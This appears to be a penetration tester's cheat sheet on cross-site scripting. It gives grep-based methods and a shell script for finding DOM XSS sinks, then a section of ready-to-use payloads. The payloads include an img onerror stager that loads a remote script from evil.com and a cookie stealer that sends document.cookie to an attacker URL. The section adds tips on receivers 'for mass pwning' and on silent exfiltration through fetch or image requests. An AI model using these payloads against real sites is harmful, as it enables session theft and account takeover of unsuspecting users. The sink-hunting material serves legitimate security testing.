# XSS Tips

## DOM Based
- Hunting (run these from the directory that holds the downloaded JS/HTML)
- Simple: grep for the sink itself, e.g. `document.write`. Inline scripts live in the HTML and the rest in the JS files, so search both:

```bash
grep -rn "document.write" ./ --include "*.html" --include "*.js"
```

- If the user input reaches the sink through a variable defined in another JS file, search for the place where that variable is assigned, e.g. `<VARIABLE>`:

```bash
grep -ERn "<VARIABLE>[ ]*=[^=]" ./ --include "*.html" --include "*.js"
```

- note: there may be a space (or none) between the variable being assigned and the `=` sign, so the space is optional; the trailing `[^=]` keeps `==` comparisons out of the results
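The two steps above, as an added example that is not from the original page: a small POSIX shell script that wraps the sink grep and the assignment grep into functions and runs them over a constructed sample corpus, so it works offline. The file contents, the sink list and the variable name `q` are assumptions.

```shell
#!/bin/sh
# Added example, not from the original page: the two grep steps wrapped
# into functions and run against a constructed sample corpus so it works
# offline. The sink list, file names and the variable name "q" are assumptions.

# Create a throwaway directory with two constructed files: one JS file that
# reads user input into a variable and writes it to the page, and one HTML
# file with an inline innerHTML sink.
make_sample_corpus() {
  dir=$(mktemp -d)
  cat > "$dir/app.js" <<'EOF'
var q   = new URLSearchParams(location.search).get('q');   // source, spaces before '='
var safe=q == null ? '' : q;                                // comparison, not an assignment
document.write("<b>" + q + "</b>");                          // sink
EOF
  cat > "$dir/index.html" <<'EOF'
<script>document.getElementById('out').innerHTML = location.hash.slice(1);</script>
EOF
  printf '%s' "$dir"
}

# Step 1: list every line that hits a common DOM XSS sink (file:line:text).
# $1 = directory to scan
find_sinks() {
  grep -rnE --include "*.html" --include "*.js" \
    "document\.write|\.innerHTML[[:space:]]*=[^=]|eval\(" "$1"
}

# Step 2: find where a variable is assigned. Optional whitespace before '='
# is allowed, a second '=' is rejected so "q == null" does not count, and the
# name must not be preceded by an identifier character so "xq =" is skipped.
# $1 = directory to scan, $2 = variable name
find_assignments() {
  grep -rnE --include "*.html" --include "*.js" \
    "(^|[^A-Za-z0-9_])$2[[:space:]]*=[^=]" "$1"
}

# Run both steps on the constructed corpus, then clean up.
corpus=$(make_sample_corpus)
echo "== sinks =="
find_sinks "$corpus"
echo "== assignments of q =="
find_assignments "$corpus" q
rm -rf "$corpus"
```

On the constructed corpus the sink search reports the `document.write` line in `app.js` and the `innerHTML` line in `index.html`, and the assignment search for `q` reports only line 1 of `app.js`, not the `q == null` comparison on line 2. Point `find_sinks` and `find_assignments` at the real download directory to use them for hunting.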
## Quick PoC Payloads
- img tag that loads a remote script (a stager: once `really_evil.js` runs in the victim's origin it can issue CSRF requests with the victim's session)

```html
<img src=a onerror="x=document.createElement('script');x.src='https://evil.com/really_evil.js';document.body.appendChild(x)" />
```
- Classic cookie stealer (the cookie string is URL-encoded so `;` and `=` inside it do not break the query string)

```html
<img src=a onerror="location.href='https://evil.com/stealer.php?cookie='+encodeURIComponent(document.cookie);">
```

- You may set up receiving servers, APIs or webhooks for mass pwning; during a test a plain `nc -l` listener is enough to catch the request
- caveat: `document.cookie` never includes cookies flagged HttpOnly, and redirecting with `location.href` is visible to the victim; loading the stealer URL as an image or with `fetch()` sends the same data silently
- iFrame with a `javascript:` URL

```html
<iframe src="javascript:alert(1)"></iframe>
```

- note: this counts as inline script, so a CSP `script-src` without `'unsafe-inline'` blocks it
Last update: February 22, 2022